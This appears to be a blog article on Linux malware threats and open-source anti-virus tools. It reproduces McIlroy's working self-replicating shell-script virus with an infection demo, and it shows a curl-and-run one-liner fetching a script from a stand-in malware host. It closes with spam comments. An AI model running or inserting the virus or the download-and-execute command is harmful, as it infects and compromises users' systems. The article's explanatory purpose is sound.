Source Code Injection, Self-Replication and Propagation
Computer virus is a collection of source code that should be able to execute by injecting itself in the execution path of another program. It must also be able to self replicate by replacing existing files with copies of files containing the injected code. And finally, a computer virus must find an infected host to propagate itself and further spread the injected source code.
Virus clicks and worms crawl
Viruses have become very common in the world of computing, injecting millions of machines with their source code. What is the difference between a worm and a virus? A worm is very similar to a virus, but varies from that of the virus in terms of how it propagates itself. It is able to enter a computer through system vulnerabilities and uses those flaws to propagate instead of user intervention like clicks to execute an e-mail attachment.
Shell Script Virus
Douglas McIlroy developed a simple shell-script virus, a 150-byte version of which he called Traductor simplicimus. The code for McIlroy’s virus is reproduced below:
for i in * #virus#
do case “`sed 1q $i`”
in “#!/bin/sh”)
grep ‘#virus#’ $i >/dev/null ||
sed -n ‘/#virus#/,$p’ $0 >$i
esac
done >/dev/null
Now, given that we have a shell-script, infected.sh Consider an example of the infection spreading:
% ls
infected.sh hello.sh
cat hello.sh
#!/bin/sh echo “Hello, World!”
% ./infected.sh
% cat hello.sh
#!/bin/sh echo “Hello, World!”
for i in * #virus#
do case “`sed 1q $i`”
in “#!/bin/sh”)
grep ‘#virus#’ $i >/dev/null ||
sed -n ‘/#virus#/,$p’ $0 >$i
esac
done >/dev/null
Modes of Virus propagation
Computer viruses can be transmitted in many ways, such as:
- Email attachments
- Malicious URLs
- Source Code
- Rootkits
In this article, I would like to emphasize that although it is very challenging for a virus to infect a Open Source OS like Linux, it does not mean you should not have ant-virus protection.
Email Attachments
Why are email attachments not so vulenarable in Linux? Well because nearly all malicious email attachments target Windows machines. Also the attachments are usually in the form of .exe or .zip files . But say that attachment has targeted Linux machines and is in the form of, say, .deb, .rpm, or .bin – what then? Well, first and foremost – if the file is in .deb format and you are using an RPM-based system, nothing will happen. If, however, you receive an email with a .rpm attachment, and you’re using an RPM-based system, what happens? It will ask you for either your root or your sudo password .The difference between this Linux model and the traditional Windows model is that when you double click on that attachment in Windows, the installation can proceed without your intervention. Click and the virus has been injected and you are the infected host.
The attachments are not normally executed in Linux and OpenBSD when they are stored as files. In order for the file to be executable under Linux or OpenBSD, the execute flag would have to be set in the permissions of the file. This is something that Windows doesn’t have, and which is often seen as one of the reasons why infecting a Windows PC can be so easy, and why it should be extremely difficult on *nix based systems. When you save an email attachment under Linux, the execute flag is normally not set and thus, the file can’t be executed just by clicking on it. So, no luck?
And if you manage your own email server such as a Postfix on a Linux machine, anti-virus scanning is a must have. Just because your email server is a Linux machine does not mean an email containing a virus is non-lethal. That email-strapped virus could easily make its way to a Windows machine where it will happily begin its infectious life.To that end, you have to install an anti-virus such as ClamAV.
Malicious URLs
One type of malicious URL is a spoofed address. A spoofed address is a malicious address that masquerades itself as a safe address. These can be in the form of a fake bank account login screen, or Paypal login. Any number of addresses can be spoofed. And any address that requires you to log in with credentials is dangerous when spoofed.
Do these types of threats directly effect the Linux operating system? No, but they do effect the user. Fortunately most modern browsers have add ons to protect your browsing experience.
NoScript is a Firefox extension and Notscript is a Chromium extension that lets you run JavaScript, Java and other active content to run only from sites that you trust. It is the best browser protection against Cross-Site Scripting (XSS) and Click-jacking attacks.
Popular search engines like Google, Yahoo and Bing keep track of your searches and keeps a search based profile of yours in their database. This security add-on prevents the search engines to do just that. However, instead of hiding your searches, this add-on generates random indistinguishable search queries to cover your original searches, which make it quite impossible for search engines to cumulate the data into any appropriate user profile. In this way, Search engines cannot keep track of your original searches.
Passive Cache fetches a cached copy of the page for the input URL from Google along with a listing of other cached copies of the same page from Archive.org Wayback Machine, enabling you to view historical versions of the page without any active connections with the target website.
Adblock Plus blocks all ads from all websites, even Facebook or YouTube. It is a community-driven open source project that aims for better ad-free internet surfing. An example of mailicious url is explained below
% bash -c “curl http://www.malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py”
It starts bash, a command shell , and passes a string argument with two simple commands to it, which bash will then execute. The first command (curl) downloads a script from a malware server and then stores the script in a place where we know that we can write to (the /tmp directory). The second command calls the Python interpreter and executes that freshly downloaded Python script.
Source Code
Because Linux is open source, you can not trust every piece of software out there. For example, any software officially supported within the Ubuntu Software Center or Debian will be safe. Once you venture outside of the realm of the known and trusted source you risk installing malicious software.
Modern desktop environments, such as Gnome and KDE, offer a nice workaround called launcher. Those are small files that describe how something should be started. Just a few lines that specify the name, the icon that should be displayed and the actual command to execute. Conveniently, the syntax of those launcher files is the same for Gnome and KDE. And those launchers don’t have to have any execute permissions set on them! Desktop environments treat those files as a special case, so when you click on them Gnome or KDE will happily execute the command that was specified within the launcher description and without the need for the execute bit to be set on the launcher itself. There was a proof of concept virus for Linux that took advantage of both GNOME and KDE launchers. This code could be added to either the (~/.config/autostart) folder for GNOME or (~/.kde/Autostart) for KDE.
Root Kits
Root kits are the real danger. A root kit is a malicious program designed to obfuscate itself such that the user has no idea it was installed or it is running. In fact, to protect against the root kits you have to install tools like rkhunter, when installing a new Linux system.
Root kits are nasty pieces of program that once installed are really difficult to remove. And some root kits are so bad they compromise your system such that you can not recover. And if you’re wondering how many root kits are out there, install rkhunter, run it, and see how many root kits it checks for. And root kits do not just attack only servers, but desktop machines can also be infected with root kits. This is especially true if your Linux machine lives on a static IP address with no firewall protection between it and the outside world.
M2Y9AJBM9BAU
This is a comment to the webmaster. I came to your “Open Source Anti-Virus | Open Source Specialist” page via Google but it was difficult to find as you were not on the first page of search results. I see you could have more visitors because there are not many comments on your website yet. I have found a website which offers to dramatically increase your rankings and traffic to your website: http://www.linklegends.com/free-trial. I managed to get close to 1000 visitors/day using their services, you could also get lot more targeted visitors from search engines than you have now. Their free trial and brought significantly more visitors to my website. Hope this helps
Take care.
Hello there, just became alert to your blog through Google, and found that it’s truly informative. I am gonna watch out for brussels. I’ll be grateful if you continue this in future. Numerous people will be benefited from your writing. Cheers!